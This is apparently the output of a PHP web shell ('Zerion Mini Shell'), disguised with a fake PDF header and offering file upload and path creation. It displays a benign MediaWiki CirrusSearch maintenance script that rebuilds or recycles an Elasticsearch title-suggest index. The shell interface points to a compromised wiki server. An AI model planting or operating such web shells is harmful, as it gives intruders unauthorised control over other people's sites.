%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /www/varak.net/wiki.varak.net/extensions/CirrusSearch/maintenance/
Upload File :
Create Path :
Current File : /www/varak.net/wiki.varak.net/extensions/CirrusSearch/maintenance/updateSuggesterIndex.php

<?php

namespace CirrusSearch\Maintenance;

use CirrusSearch\Connection;
use CirrusSearch\DataSender;
use CirrusSearch\ElasticsearchIntermediary;
use CirrusSearch\Util;
use CirrusSearch\BuildDocument\SuggestBuilder;
use CirrusSearch\BuildDocument\SuggestScoringMethodFactory;
use CirrusSearch\BuildDocument\SuggestScoringMethod;
use CirrusSearch\Maintenance\Validators\AnalyzersValidator;
use CirrusSearch\SearchConfig;
use Elastica;
use Elastica\Index;
use Elastica\Query;
use Elastica\Request;
use Elastica\Status;
use MWElasticUtils;

/**
 * Update the search configuration on the search backend for the title
 * suggest index.
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License along
 * with this program; if not, write to the Free Software Foundation, Inc.,
 * 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
 * http://www.gnu.org/copyleft/gpl.html
 */

// Locate the MediaWiki installation: use the MW_INSTALL_PATH environment
// variable when it is set, otherwise fall back to the directory three levels
// above this script.
$IP = getenv( 'MW_INSTALL_PATH' );
$IP = ( $IP === false ) ? __DIR__ . '/../../..' : $IP;

// Core maintenance framework first, then the CirrusSearch base class that
// UpdateSuggesterIndex extends.
require_once "$IP/maintenance/Maintenance.php";
require_once __DIR__ . '/../includes/Maintenance/Maintenance.php';

/**
 * Maintenance script that builds the title suggest (completion suggester)
 * index.
 *
 * Two strategies are implemented:
 *  - rebuild(): create a new index, fill it, enable replicas, switch the
 *    alias to it, record the versions and delete the previous index;
 *  - recycle(): re-index into the existing index, then delete the documents
 *    that do not carry the current batch id.
 *
 * execute() picks recycle() when canRecycle() returns true and rebuild()
 * otherwise.
 */
class UpdateSuggesterIndex extends Maintenance {
	/**
	 * @var string language code we're building for
	 */
	private $langCode;

	/**
	 * @var int number of documents requested per scroll batch ('size')
	 */
	private $indexChunkSize;

	/**
	 * @var int number of attempts passed to MWElasticUtils::withRetry()
	 *  and MWElasticUtils::iterateOverScroll()
	 */
	private $indexRetryAttempts;

	/**
	 * @var string index type, always Connection::TITLE_SUGGEST_TYPE
	 */
	private $indexTypeName;

	/**
	 * @var string
	 */
	private $indexBaseName;

	/**
	 * @var string|null identifier of the index being built. Only assigned by
	 *  rebuild(); it keeps its initial null value when recycling.
	 */
	private $indexIdentifier;

	/**
	 * @var string the score method name to use.
	 */
	private $scoreMethodName;

	/**
	 * @var SuggestScoringMethod the score function to use.
	 */
	private $scoreMethod;

	/**
	 * @var Index old suggester index that will be deleted at the end of the process
	 */
	private $oldIndex;

	/**
	 * @var int|null last percentage handled by outputProgress()
	 */
	private $lastProgressPrinted;

	/**
	 * @var bool optimize the index when done.
	 */
	private $optimizeIndex;

	/**
	 * @var int|string value of $wgCirrusSearchMaxShardsPerNode for this index
	 *  type, or the string 'unlimited' when none is configured
	 */
	protected $maxShardsPerNode;

	/**
	 * @var string[] list of available plugins
	 */
	private $availablePlugins;

	/**
	 * @var bool index geo contextualized suggestions
	 */
	private $withGeo;

	/**
	 * @var string master_timeout value sent with index/alias/settings requests
	 */
	private $masterTimeout;

	/**
	 * @var ConfigUtils
	 */
	private $utils;

	/**
	 * @todo: public (used in closure)
	 * @var SuggestBuilder
	 */
	public $builder;

	/**
	 * @var AnalysisConfigBuilder
	 */
	private $analysisConfigBuilder;

	/**
	 * @var bool set to true by recycle(); not read anywhere else in this class
	 */
	private $recycle = false;

	/**
	 * @var string[]
	 */
	private $bannedPlugins;

	/**
	 * Register the script description and its command line options.
	 */
	public function __construct() {
		parent::__construct();
		$this->addDescription( "Create a new suggester index. Always operates on a single cluster." );
		$this->addOption( 'baseName', 'What basename to use for all indexes, ' .
			'defaults to wiki id', false, true );
		$this->addOption( 'indexChunkSize', 'Documents per shard to index in a batch.   ' .
			'Note when changing the number of shards that the old shard size is used, not the new ' .
			'one.  If you see many errors submitting documents in bulk but the automatic retry as ' .
			'singles works then lower this number.  Defaults to 100.', false, true );
		$this->addOption( 'indexRetryAttempts', 'Number of times to back off and retry ' .
			'per failure.  Note that failures are not common but if Elasticsearch is in the process ' .
			'of moving a shard this can time out.  This will retry the attempt after some backoff ' .
			'rather than failing the whole reindex process.  Defaults to 5.', false, true );
		$this->addOption( 'optimize', 'Optimize the index to 1 segment. Defaults to false.', false, false );
		$this->addOption( 'with-geo', 'Build geo contextualized suggestions. Defaults to false.', false, false );
		$this->addOption( 'scoringMethod', 'The scoring method to use when computing suggestion weights. ' .
			'Defaults to $wgCirrusSearchCompletionDefaultScore or quality if unset.', false, true );
		$this->addOption( 'masterTimeout', 'The amount of time to wait for the master to respond to mapping ' .
			'updates before failing. Defaults to $wgCirrusSearchMasterTimeout.', false, true );
		$this->addOption( 'replicationTimeout', 'The amount of time (seconds) to wait for the replica shards to initialize. ' .
			'Defaults to 3600 seconds.', false, true );
		$this->addOption( 'allocationIncludeTag', 'Set index.routing.allocation.include.tag on the created index. ' .
			'Useful if you want to force the suggester index not to be allocated on a specific set of nodes.',
			false, true );
		$this->addOption( 'allocationExcludeTag', 'Set index.routing.allocation.exclude.tag on the created index. ' .
			'Useful if you want to force the suggester index not to be allocated on a specific set of nodes.',
			false, true );
	}

	/**
	 * Entry point: read the options and configuration, then either recycle
	 * the existing suggester index or rebuild a new one.
	 *
	 * Elastica exceptions raised while rebuilding/recycling are reported
	 * through error() with a die code of 1.
	 *
	 * @throws \Exception when the Cirrus meta store is not ready; this
	 *  exception is not caught here.
	 */
	public function execute() {
		global $wgLanguageCode,
			$wgCirrusSearchBannedPlugins,
			$wgCirrusSearchMasterTimeout,
			$wgCirrusSearchMaxShardsPerNode,
			$wgCirrusSearchCompletionDefaultScore;

		$this->disablePoolCountersAndLogging();
		$this->masterTimeout = $this->getOption( 'masterTimeout', $wgCirrusSearchMasterTimeout );
		$this->indexTypeName = Connection::TITLE_SUGGEST_TYPE;

		// Check that all shards and replicas settings are set
		try {
			$this->getShardCount();
			$this->getReplicaCount();
		} catch ( \Exception $e ) {
			$this->error( "Failed to get shard count and replica count information: {$e->getMessage()}", 1 );
		}

		$this->indexBaseName = $this->getOption( 'baseName', $this->getSearchConfig()->get( SearchConfig::INDEX_BASE_NAME ) );
		// Command line values arrive as strings; normalise to the documented int type.
		$this->indexChunkSize = (int)$this->getOption( 'indexChunkSize', 100 );
		// The option is registered as 'indexRetryAttempts' in the constructor;
		// reading any other name would always yield the default.
		$this->indexRetryAttempts = (int)$this->getOption( 'indexRetryAttempts', 5 );

		$this->optimizeIndex = $this->getOption( 'optimize', false );
		$this->withGeo = $this->getOption( 'with-geo', false );

		$this->utils = new ConfigUtils( $this->getClient(), $this );

		$this->langCode = $wgLanguageCode;
		$this->bannedPlugins = $wgCirrusSearchBannedPlugins;

		$this->availablePlugins = $this->utils->scanAvailablePlugins( $this->bannedPlugins );
		$this->analysisConfigBuilder = $this->pickAnalyzer( $this->langCode, $this->availablePlugins );

		$this->utils->checkElasticsearchVersion();

		$this->maxShardsPerNode = isset( $wgCirrusSearchMaxShardsPerNode[ $this->indexTypeName ] )
			? $wgCirrusSearchMaxShardsPerNode[ $this->indexTypeName ]
			: 'unlimited';

		$this->scoreMethodName = $this->getOption( 'scoringMethod', $wgCirrusSearchCompletionDefaultScore );
		$this->scoreMethod = SuggestScoringMethodFactory::getScoringMethod( $this->scoreMethodName );
		$this->builder = new SuggestBuilder( $this->scoreMethod, $this->withGeo );

		try {
			// If the version does not exist it's certainly because nothing has been indexed.
			if ( !MetaStoreIndex::cirrusReady( $this->getConnection() ) ) {
				throw new \Exception( "Cirrus meta store does not exist, you must index your data first" );
			}

			if ( !$this->canWrite() ) {
				$this->error( 'Index/Cluster is frozen. Giving up.', 1 );
			}

			# check for broken indices and delete them
			$this->checkAndDeleteBrokenIndices();

			if ( !$this->canRecycle() ) {
				$this->rebuild();
			} else {
				$this->recycle();
			}
		} catch ( \Elastica\Exception\Connection\HttpException $e ) {
			$message = $e->getMessage();
			$this->log( "\nUnexpected Elasticsearch failure.\n" );
			$this->error( "Http error communicating with Elasticsearch:  $message.\n", 1 );
		} catch ( \Elastica\Exception\ExceptionInterface $e ) {
			$type = get_class( $e );
			$message = ElasticsearchIntermediary::extractMessage( $e );
			/** @suppress PhanUndeclaredMethod ExceptionInterface has no methods */
			$trace = $e->getTraceAsString();
			$this->log( "\nUnexpected Elasticsearch failure.\n" );
			$this->error( "Elasticsearch failed in an unexpected way.  This is always a bug in CirrusSearch.\n" .
				"Error type: $type\n" .
				"Message: $message\n" .
				"Trace:\n" . $trace, 1 );
		}
	}

	/**
	 * Check the frozen indices
	 * @return bool true if the cluster/index is not frozen, false otherwise.
	 */
	private function canWrite() {
		// Reuse DataSender even if we don't send anything with it.
		$sender = new DataSender( $this->getConnection(), $this->getSearchConfig() );
		return $sender->areIndexesAvailableForWrites( [ $this->getIndexTypeName() ] );
	}

	/**
	 * Check for duplicate indices that may have been created
	 * by a previous update that failed.
	 *
	 * Nothing is done when fewer than two indices exist for the type.
	 * Indices currently behind the alias are never touched; the remaining
	 * ones are deleted only when their stats report no suggest usage.
	 */
	private function checkAndDeleteBrokenIndices() {
		$indices = $this->utils->getAllIndicesByType( $this->getIndexTypeName() );
		if ( count( $indices ) < 2 ) {
			return;
		}
		$indexByName = [];
		foreach ( $indices as $name ) {
			$indexByName[$name] = $this->getConnection()->getIndex( $name );
		}

		$status = new Status( $this->getClient() );
		foreach ( $status->getIndicesWithAlias( $this->getIndexTypeName() ) as $aliased ) {
			// do not try to delete indices that are used in aliases
			unset( $indexByName[$aliased->getName()] );
		}
		foreach ( $indexByName as $name => $index ) {
			# double check with stats
			$stats = $index->getStats()->getData();
			// Extra check: if stats report usages we should not try to fix things
			// automatically.
			if ( $stats['_all']['total']['suggest']['total'] == 0 ) {
				$this->log( "Deleting broken index {$index->getName()}\n" );
				$this->deleteIndex( $index );
			} else {
				$this->log( "Broken index {$index->getName()} appears to be in use, please check and delete.\n" );
			}
		}
		# If something went wrong the process will fail when calling pickIndexIdentifierFromOption
	}

	/**
	 * Build a brand new suggester index and swap it in place of the old one.
	 *
	 * Steps, in order: create the index, index the data, optionally optimize,
	 * enable replicas, refresh, move the alias, record the versions and
	 * delete the previous index.
	 */
	private function rebuild() {
		$oldIndexIdentifier = $this->utils->pickIndexIdentifierFromOption( 'current', $this->getIndexTypeName() );
		$this->oldIndex = $this->getConnection()->getIndex( $this->indexBaseName, $this->indexTypeName, $oldIndexIdentifier );
		$this->indexIdentifier = $this->utils->pickIndexIdentifierFromOption( 'now', $this->getIndexTypeName() );

		$this->createIndex();
		$this->indexData();
		if ( $this->optimizeIndex ) {
			$this->optimize();
		}
		$this->enableReplicas();
		$this->getIndex()->refresh();
		$this->validateAlias();
		$this->updateVersions();
		$this->deleteOldIndex();
		$this->log( "Done.\n" );
	}

	/**
	 * Decide whether the current index can be re-used instead of rebuilt.
	 *
	 * Recycling is refused (with a message printed through error()) when the
	 * feature is disabled by $wgCirrusSearchRecycleCompletionSuggesterIndex,
	 * the index does not exist, its refresh interval is not -1, its shard
	 * count differs from the configured one, the stored major versions of
	 * the analysis/mapping config differ, or the analyzers do not validate.
	 *
	 * @return bool true when the existing index can be recycled
	 */
	private function canRecycle() {
		global $wgCirrusSearchRecycleCompletionSuggesterIndex;
		if ( !$wgCirrusSearchRecycleCompletionSuggesterIndex ) {
			return false;
		}
		$oldIndexIdentifier = $this->utils->pickIndexIdentifierFromOption( 'current', $this->getIndexTypeName() );
		$oldIndex = $this->getConnection()->getIndex( $this->indexBaseName, $this->indexTypeName, $oldIndexIdentifier );
		if ( !$oldIndex->exists() ) {
			$this->error( 'Index does not exist yet cannot recycle.' );
			return false;
		}
		$refresh = $oldIndex->getSettings()->getRefreshInterval();
		if ( $refresh != '-1' ) {
			$this->error( 'Refresh interval is not -1, cannot recycle.' );
			return false;
		}

		$shards = $oldIndex->getSettings()->get( 'number_of_shards' );
		// We check only the number of shards since it cannot be updated.
		if ( $shards != $this->getShardCount() ) {
			$this->error( 'Number of shards mismatch cannot recycle.' );
			return false;
		}

		// Only the major part of each version is compared below.
		list( $mMaj ) = explode( '.', \CirrusSearch\Maintenance\SuggesterMappingConfigBuilder::VERSION );
		list( $aMaj ) = explode( '.', \CirrusSearch\Maintenance\SuggesterAnalysisConfigBuilder::VERSION );

		try {
			$versionDoc = MetaStoreIndex::getVersionType( $this->getConnection() )->getDocument( $this->getIndexTypeName() );
		} catch ( \Elastica\Exception\NotFoundException $nfe ) {
			$this->error( 'Index missing in mw_cirrus_metastore::version, cannot recycle.' );
			return false;
		}

		if ( $versionDoc->analysis_maj != $aMaj ) {
			$this->error( 'Analysis config version mismatch, cannot recycle.' );
			return false;
		}

		if ( $versionDoc->mapping_maj != $mMaj ) {
			$this->error( 'Mapping config version mismatch, cannot recycle.' );
			return false;
		}

		$validator = new AnalyzersValidator( $oldIndex, $this->analysisConfigBuilder, $this );
		$status = $validator->validate();
		if ( !$status->isOK() ) {
			$this->error( 'Analysis config differs, cannot recycle.' );
			return false;
		}

		return true;
	}

	/**
	 * Recycle a suggester index:
	 * 1/ index data (delete docs if it already exists)
	 * 2/ expunge deleted docs
	 * 3/ refresh the reader
	 *    - so we can run a quick delete on remaining docs
	 *      (the docs that were actually deleted)
	 *    - drawbacks we load the FST from an un-optimized index
	 * 4/ delete old docs
	 * 5/ optimize
	 * 6/ refresh the reader
	 *
	 * Drawbacks: the FST will be read from disk twice in a short
	 * amount of time.
	 * This is a trade off between cluster operation and disk operation.
	 * Recreating the index may require less disk operations but causes
	 * the cluster to rebalance.
	 * This is certainly the best strategy for small indices (less than 100k docs)
	 * but needs to be carefully tested on bigger indices with high QPS.
	 */
	private function recycle() {
		$this->log( "Recycling index {$this->getIndex()->getName()}\n" );
		$this->recycle = true;
		$this->indexData();
		// This is fragile... hopefully most of the docs will be deleted from the old segments
		// and will result in a fast operation.
		// New segments should not be affected.
		// Unfortunately if a failure causes the process to stop
		// the FST will maybe contains duplicates as it cannot (elastic 1.7)
		// filter deleted docs. We will rely on output deduplication
		// but this will certainly affect performances.

		$this->expungeDeletes();
		// Refresh the reader so we can scroll over remaining docs.
		// At this point we may read the new un-optimized FST segments
		// Old ones should be pretty small after expungeDeletes
		$this->getIndex()->refresh();

		// Select every document whose batch_id differs from the current batch.
		$boolNot = new Elastica\Query\BoolQuery();
		$boolNot->addMustNot(
			new Elastica\Query\Term( [ "batch_id" => $this->builder->getBatchId() ] )
		);
		$bool = new Elastica\Query\BoolQuery();
		$bool->addFilter( $boolNot );

		$query = new Elastica\Query();
		$query->setQuery( $bool );
		$query->setFields( [ '_id' ] );

		$scrollOptions = [
			'search_type' => 'scan',
			'scroll' => "15m",
			'size' => $this->indexChunkSize
		];
		$result = $this->getIndex()->search( $query, $scrollOptions );

		$totalDocsInIndex = $result->getResponse()->getData();
		$totalDocsInIndex = $totalDocsInIndex['hits']['total'];
		$totalDocsToDump = $totalDocsInIndex;

		// Explicit start value for the counter captured by reference below.
		$docsDumped = 0;

		$this->log( "Deleting remaining docs from previous batch ($totalDocsInIndex).\n" );
		MWElasticUtils::iterateOverScroll( $this->getIndex(), $result->getResponse()->getScrollId(), '15m',
			function ( $results ) use ( &$docsDumped, $totalDocsToDump ) {
				$docIds = [];
				foreach ( $results as $result ) {
					$docsDumped++;
					$docIds[] = $result->getId();
				}
				$this->outputProgress( $docsDumped, $totalDocsToDump );
				MWElasticUtils::withRetry( $this->indexRetryAttempts,
					function () use ( $docIds ) {
						$this->getType()->deleteIds( $docIds );
					}
				);
			}, 0, $this->indexRetryAttempts );
		$this->log( "Done.\n" );
		// Old docs should be deleted now we can optimize and flush
		$this->optimize();

		// @todo add support for changing the number of replicas
		// if the setting was changed in cirrus config.
		// Workaround is to change the settings directly on the cluster.

		// Refresh the reader so it now uses the optimized FST,
		// and actually free and delete old segments.
		$this->getIndex()->refresh();
	}

	/**
	 * Delete the index recorded in $this->oldIndex, if it is set and exists.
	 */
	private function deleteOldIndex() {
		if ( $this->oldIndex && $this->oldIndex->exists() ) {
			$this->log( "Deleting " . $this->oldIndex->getName() . " ... " );
			// @todo Utilize $this->oldIndex->delete(...) once Elastica library is updated
			// to allow passing the master_timeout
			$this->oldIndex->request(
				'',
				Request::DELETE,
				[],
				[ 'master_timeout' => $this->masterTimeout ]
			);
			$this->output( "ok.\n" );
		}
	}

	/**
	 * Delete an index
	 * @param \Elastica\Index $index
	 */
	private function deleteIndex( \Elastica\Index $index ) {
		// @todo Utilize $index->delete(...) once Elastica library is updated
		// to allow passing the master_timeout
		$index->request(
			'',
			Request::DELETE,
			[],
			[ 'master_timeout' => $this->masterTimeout ]
		);
	}

	/**
	 * Ask Elasticsearch to optimize the index down to a single segment.
	 */
	private function optimize() {
		$this->log( "Optimizing index..." );
		$this->getIndex()->optimize( [ 'max_num_segments' => 1 ] );
		$this->output( "ok.\n" );
	}

	/**
	 * Run an optimize request limited to expunging deleted documents,
	 * with flush disabled.
	 */
	private function expungeDeletes() {
		$this->log( "Purging deleted docs..." );
		$this->getIndex()->optimize( [ 'only_expunge_deletes' => true, 'flush' => false ] );
		$this->output( "ok.\n" );
	}

	/**
	 * Scroll over the CONTENT and GENERAL indices, build suggestion documents
	 * with $this->builder and add them to the suggester index.
	 *
	 * Before indexing, the document count of the CONTENT index is fetched and
	 * handed to the scoring method through setMaxDocs().
	 */
	private function indexData() {
		// We build the suggestions by reading CONTENT and GENERAL indices.
		// This does not support extra indices like FILES on commons.
		$sourceIndexTypes = [ Connection::CONTENT_INDEX_TYPE, Connection::GENERAL_INDEX_TYPE ];

		// Indices to use for counting max_docs used by scoring functions
		// Since we work mostly on the content namespace it seems OK to count
		// only docs in the CONTENT index.
		$countIndices = [ Connection::CONTENT_INDEX_TYPE ];

		$query = new Query();
		$query->setFields( [ '_id', '_type', '_source' ] );
		$query->setSource( [
			'include' => $this->builder->getRequiredFields()
		] );

		// Pages that are in NS_MAIN or that have a redirect in NS_MAIN.
		$pageAndNs = new Elastica\Query\BoolQuery();
		$pageAndNs->addShould( new Elastica\Query\Term( [ "namespace" => NS_MAIN ] ) );
		$pageAndNs->addShould( new Elastica\Query\Term( [ "redirect.namespace" => NS_MAIN ] ) );
		$pageAndNs->addMust( new Elastica\Query\Type( Connection::PAGE_TYPE_NAME ) );
		$bool = new Elastica\Query\BoolQuery();
		$bool->addFilter( $pageAndNs );

		$query->setQuery( $bool );

		// Run a first query to count the number of docs.
		// This is needed for the scoring methods that need
		// to normalize values against wiki size.
		$mSearch = new \Elastica\Multi\Search( $this->getClient() );
		foreach ( $countIndices as $sourceIndexType ) {
			$search = new \Elastica\Search( $this->getClient() );
			$search->addIndex( $this->getConnection()->getIndex( $this->indexBaseName, $sourceIndexType ) );
			$search->setOption( \Elastica\Search::OPTION_SEARCH_TYPE, \Elastica\Search::OPTION_SEARCH_TYPE_COUNT );
			$mSearch->addSearch( $search );
		}

		$mSearchRes = $mSearch->search();
		$total = 0;
		foreach ( $mSearchRes as $res ) {
			$total += $res->getTotalHits();
		}
		$this->log( "Setting max_docs to $total\n" );
		$this->scoreMethod->setMaxDocs( $total );

		foreach ( $sourceIndexTypes as $sourceIndexType ) {
			$scrollOptions = [
				'search_type' => 'scan',
				'scroll' => "15m",
				'size' => $this->indexChunkSize
			];

			$sourceIndex = $this->getConnection()->getIndex( $this->indexBaseName, $sourceIndexType );
			$result = $sourceIndex->search( $query, $scrollOptions );
			$totalDocsInIndex = $result->getResponse()->getData();
			$totalDocsInIndex = $totalDocsInIndex['hits']['total'];
			$totalDocsToDump = $totalDocsInIndex;

			$docsDumped = 0;
			$this->log( "Indexing $totalDocsToDump documents from $sourceIndexType ($totalDocsInIndex in the index) with batchId: {$this->builder->getBatchId()} and scoring method: {$this->scoreMethodName}\n" );

			$destinationType = $this->getIndex()->getType( Connection::TITLE_SUGGEST_TYPE_NAME );

			MWElasticUtils::iterateOverScroll( $sourceIndex, $result->getResponse()->getScrollId(), '15m',
				function ( $results ) use ( &$docsDumped, $totalDocsToDump,
						$destinationType ) {
					$inputDocs = [];
					foreach ( $results as $result ) {
						$docsDumped++;
						$inputDocs[] = [
							'id' => $result->getId(),
							'source' => $result->getSource()
						];
					}

					$suggestDocs = $this->builder->build( $inputDocs );
					$this->outputProgress( $docsDumped, $totalDocsToDump );
					MWElasticUtils::withRetry( $this->indexRetryAttempts,
						function () use ( $destinationType, $suggestDocs ) {
							$destinationType->addDocuments( $suggestDocs );
						}
					);
				}, 0, $this->indexRetryAttempts );
			$this->log( "Indexing from $sourceIndexType index done.\n" );
		}
	}

	/**
	 * Point the alias (named after the index type) at the index being built,
	 * removing it from every index that currently carries it, in a single
	 * _aliases request.
	 */
	public function validateAlias() {
		// @todo utilize the following once Elastica is updated to support passing
		// master_timeout. This is a copy of the Elastica\Index::addAlias() method
		// $this->getIndex()->addAlias( $this->getIndexTypeName(), true );
		$index = $this->getIndex();
		$name = $this->getIndexTypeName();

		$path = '_aliases';
		$data = [ 'actions' => [] ];
		$status = new Status( $index->getClient() );
		foreach ( $status->getIndicesWithAlias( $name ) as $aliased ) {
			$data['actions'][] = [ 'remove' => [ 'index' => $aliased->getName(), 'alias' => $name ] ];
		}

		$data['actions'][] = [ 'add' => [ 'index' => $index->getName(), 'alias' => $name ] ];

		$index->getClient()->request( $path, Request::POST, $data, [ 'master_timeout' => $this->masterTimeout ] );
	}

	/**
	 * Print the completion percentage, at most once per distinct percentage
	 * and only for even percentages.
	 *
	 * public because php 5.3 does not support accessing private
	 * methods in a closure.
	 * @param int $docsDumped number of documents processed so far
	 * @param int $limit total number of documents expected
	 */
	public function outputProgress( $docsDumped, $limit ) {
		// Nothing to report yet, or no meaningful total to divide by.
		if ( $docsDumped <= 0 || $limit <= 0 ) {
			return;
		}
		$pctDone = (int)( ( $docsDumped / $limit ) * 100 );
		if ( $this->lastProgressPrinted == $pctDone ) {
			return;
		}
		$this->lastProgressPrinted = $pctDone;
		if ( ( $pctDone % 2 ) == 0 ) {
			$this->outputIndented( "\t$pctDone% done...\n" );
		}
	}

	/**
	 * Output a message prefixed with the current date and time.
	 *
	 * @param string $message
	 * @param mixed $channel passed through to the parent output() method
	 */
	public function log( $message, $channel = null ) {
		$date = new \DateTime();
		parent::output( $date->format( 'Y-m-d H:i:s' ) . " " . $message, $channel );
	}

	/**
	 * Create the analysis config builder for the suggester and print the
	 * default text analyzer type it reports.
	 *
	 * @param string $langCode
	 * @param array $availablePlugins
	 * @return AnalysisConfigBuilder
	 */
	private function pickAnalyzer( $langCode, array $availablePlugins = [] ) {
		$analysisConfigBuilder = new \CirrusSearch\Maintenance\SuggesterAnalysisConfigBuilder( $langCode, $availablePlugins );
		$this->outputIndented( 'Picking analyzer...' .
			$analysisConfigBuilder->getDefaultTextAnalyzerType() . "\n" );
		return $analysisConfigBuilder;
	}

	/**
	 * Create the new suggester index with its settings and mappings, then
	 * wait for it to become green.
	 *
	 * @throws \Exception when the index already exists
	 */
	private function createIndex() {
		// 'unlimited' is translated to -1 for total_shards_per_node.
		$maxShardsPerNode = $this->maxShardsPerNode === 'unlimited' ? -1 : $this->maxShardsPerNode;
		// This is "create only" for now.
		if ( $this->getIndex()->exists() ) {
			throw new \Exception( "Index already exists." );
		}

		$mappingConfigBuilder = new SuggesterMappingConfigBuilder();

		// We create the index with 0 replicas, this is faster and will
		// stress less nodes with 4 shards and 2 replicas we would
		// stress 12 nodes (moreover with the optimize flag)
		$settings = [
			'number_of_shards' => $this->getShardCount(),
			// hacky but we still use auto_expand_replicas
			// for convenience on small install.
			'auto_expand_replicas' => "0-0",
			'refresh_interval' => -1,
			'analysis' => $this->analysisConfigBuilder->buildConfig(),
			'routing.allocation.total_shards_per_node' => $maxShardsPerNode,
		];

		if ( $this->hasOption( 'allocationIncludeTag' ) ) {
			$this->output( "Using routing.allocation.include.tag: {$this->getOption( 'allocationIncludeTag' )}, " .
				"the index might be stuck in red if the cluster is not properly configured.\n" );
			$settings['routing.allocation.include.tag'] = $this->getOption( 'allocationIncludeTag' );
		}

		if ( $this->hasOption( 'allocationExcludeTag' ) ) {
			$this->output( "Using routing.allocation.exclude.tag: {$this->getOption( 'allocationExcludeTag' )}, " .
				"the index might be stuck in red if the cluster is not properly configured.\n" );
			$settings['routing.allocation.exclude.tag'] = $this->getOption( 'allocationExcludeTag' );
		}

		$args = [
			'settings' => $settings,
			'mappings' => $mappingConfigBuilder->buildConfig()
		];
		// @todo utilize $this->getIndex()->create(...) once it supports setting
		// the master_timeout parameter.
		$this->getIndex()->request(
			'',
			Request::PUT,
			$args,
			[ 'master_timeout' => $this->masterTimeout ]
		);

		// Index create is async, we have to make sure that the index is ready
		// before sending any docs to it.
		$this->waitForGreen();
	}

	/**
	 * Set auto_expand_replicas to the configured replica count and wait for
	 * the index to become green again (up to the 'replicationTimeout'
	 * option, 3600 by default).
	 */
	private function enableReplicas() {
		$this->log( "Enabling replicas...\n" );
		$args = [
			'index' => [
				'auto_expand_replicas' => $this->getReplicaCount(),
			],
		];

		$path = $this->getIndex()->getName() . "/_settings";
		$this->getIndex()->getClient()->request(
			$path,
			Request::PUT,
			$args,
			[ 'master_timeout' => $this->masterTimeout ]
		);

		// The previous call seems to be async, let's wait few sec
		// otherwise replication won't have time to start.
		sleep( 20 );

		// Index will be yellow while replica shards are being allocated.
		$this->waitForGreen( $this->getOption( 'replicationTimeout', 3600 ) );
	}

	/**
	 * Wait for the index to go green; report an error with die code 1 when
	 * ConfigUtils::waitForGreen() returns a falsy value.
	 *
	 * @param int $timeout timeout handed to ConfigUtils::waitForGreen()
	 */
	private function waitForGreen( $timeout = 600 ) {
		$this->log( "Waiting for the index to go green...\n" );
		// Wait for the index to go green ( default 10 min)
		if ( !$this->utils->waitForGreen( $this->getIndex()->getName(), $timeout ) ) {
			$this->error( "Failed to wait for green... please check config and delete the {$this->getIndex()->getName()} index if it was created.", 1 );
		}
	}

	/**
	 * @return string Number of replicas this index should have. May be a range such as '0-2'
	 */
	private function getReplicaCount() {
		return $this->getConnection()->getSettings()->getReplicaCount( $this->indexTypeName );
	}

	/**
	 * @return int Number of shards configured for this index type
	 */
	private function getShardCount() {
		return $this->getConnection()->getSettings()->getShardCount( $this->indexTypeName );
	}

	/**
	 * Store the analysis/mapping versions and the shard count of the
	 * suggester index in the meta store version type.
	 *
	 * @throws \Exception when the meta store version type does not exist
	 */
	private function updateVersions() {
		$this->log( "Updating tracking indexes..." );
		$versionType = MetaStoreIndex::getVersionType( $this->getConnection() );
		if ( !$versionType->exists() ) {
			throw new \Exception( "meta store does not exist, you must index your data first" );
		}
		list( $aMaj, $aMin ) = explode( '.', \CirrusSearch\Maintenance\SuggesterAnalysisConfigBuilder::VERSION );
		list( $mMaj, $mMin ) = explode( '.', \CirrusSearch\Maintenance\SuggesterMappingConfigBuilder::VERSION );
		// The document id is the index type name, which is what canRecycle() looks up.
		$doc = new \Elastica\Document(
			$this->getIndexTypeName(),
			[
				'analysis_maj' => $aMaj,
				'analysis_min' => $aMin,
				'mapping_maj' => $mMaj,
				'mapping_min' => $mMin,
				'shard_count' => $this->getShardCount(),
			]
		);
		$versionType->addDocument( $doc );
		$this->output( "ok.\n" );
	}

	/**
	 * NOTE(review): $this->indexIdentifier is only assigned by rebuild(); on
	 * the recycle path it is null, which presumably makes the connection
	 * resolve the alias name -- confirm against Connection::getIndex().
	 *
	 * @return \Elastica\Index being updated
	 */
	public function getIndex() {
		return $this->getConnection()->getIndex( $this->indexBaseName, $this->indexTypeName, $this->indexIdentifier );
	}

	/**
	 * @return \Elastica\Type the title suggest type of the index being updated
	 */
	public function getType() {
		return $this->getIndex()->getType( Connection::TITLE_SUGGEST_TYPE_NAME );
	}

	/**
	 * @return Elastica\Client
	 */
	protected function getClient() {
		return $this->getConnection()->getClient();
	}

	/**
	 * @return string name of the index type being updated
	 */
	protected function getIndexTypeName() {
		return $this->getConnection()->getIndexName( $this->indexBaseName, $this->indexTypeName );
	}
}

// Name the maintenance class defined in this file (::class yields the fully
// qualified name), then include the file named by RUN_MAINTENANCE_IF_MAIN.
// $maintClass must be assigned before the include.
$maintClass = UpdateSuggesterIndex::class;
require_once RUN_MAINTENANCE_IF_MAIN;

Zerion Mini Shell 1.0